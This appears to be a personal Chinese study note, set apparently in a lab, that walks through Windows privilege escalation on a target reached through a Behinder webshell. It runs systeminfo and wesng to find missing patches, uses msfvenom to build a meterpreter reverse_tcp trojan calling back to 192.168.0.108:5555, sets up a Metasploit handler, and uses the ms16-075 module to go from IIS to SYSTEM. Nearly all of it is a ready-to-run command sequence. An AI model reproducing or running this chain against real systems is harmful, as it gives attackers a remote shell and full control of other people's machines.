这里利用冰蝎远程连接到了靶机上:
利用systeminfo查看靶机系统的补丁;
如果有权限可以在靶机上创建txt文件保存,在用冰蝎下载下来,没有的话就复制粘贴到本地txt文件。
然后就利用本机下载的wesng去对比补丁库吧,命令如下:
wesng目录下:
python wes.py systeminfo.txt -o vuln.csv
对比结果保存为vuln.csv文件:
这里我们就有可利用的补丁漏洞了;
接下来用linux或者忍者系统去创建一个远程木马
命令行下:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.108(反弹shell的主机) LPORT=5555 -f exe -o test.exe
这里就创建了一个木马,然后把他上传到靶机上(这里没做免杀,因为我还没学到)
在运行木马前,我们要进行监听,这样执行结果我们才能知道。
命令行下:msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
show options(显示可以设置什么参数)
set LHOST 0.0.0.0 (什么都接受)
set LPORT 5555(和上面对应)、
exploit(执行)
这里就开始监听了。我们再用冰蝎去连接网站后台,执行test.exe文件,Linux主机上就可以监听结果了。
用getuid 查看获取的权限——这里权限应当是IIS网站权限。命令)
然后我们就可以利用前面的补丁漏洞进行提权了。
background 返回session会话,不要打错了,打成exit 你就重新来过了。命令)
这里我选择的是ms16-075漏洞;
search ms16 查看ms16漏洞(命令)
找到ms16-075那个
use 前面的ms16-075漏洞名称 命令)
set session 1(就是刚才那个会话,这里我的是1)
set LHOST 你的linux 主机地址
set LPORT 端口,这里不要和上面5555一样,因为是两个会话
exploit 执行
成功。
getuid 查看获取的权限 显示的应该是system权限了
个人笔记,只是记下思路。